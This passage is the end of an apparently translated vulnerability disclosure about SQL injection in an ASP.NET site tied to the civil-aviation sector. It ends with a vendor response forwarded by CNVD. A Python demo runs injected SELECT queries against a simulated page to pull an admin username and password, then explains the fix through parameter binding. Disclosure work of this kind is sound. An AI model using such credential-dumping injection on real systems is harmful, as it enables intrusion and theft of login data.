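    return wrapped


if __name__ == "__main__":
    print("vulnerable:", is_injectable(vulnerable_page))   # True
    print("fixed:     ", is_injectable(fixed_page))        # False
    print("username:  ", extract(vulnerable_page, "SELECT username FROM admin"))      # admin
    print("password:  ", extract(vulnerable_page, "SELECT userpassword FROM admin"))  # s3cret
    print("unstable:  ", extract(unstable(vulnerable_page, 7), "SELECT username FROM admin"))
```

On the fix: filtering the parameter is not what closes this hole; binding it as a typed parameter is, as `fixed_page` shows. The equivalent in the ASP.NET page is a `SqlCommand` whose `id` is supplied through `SqlParameter` rather than concatenated into the query string. The `unstable` run is also a reminder to re-dump any row whose characters look off before drawing conclusions from it.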

Copyright notice: please credit 帅克笛枫@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-05-06 18:44

Vendor reply:

CNVD has not directly reproduced the described situation; the report has been forwarded via CNCERT to the civil-aviation industry assessment centre, which will coordinate handling with the website's operating unit.

Latest status:

None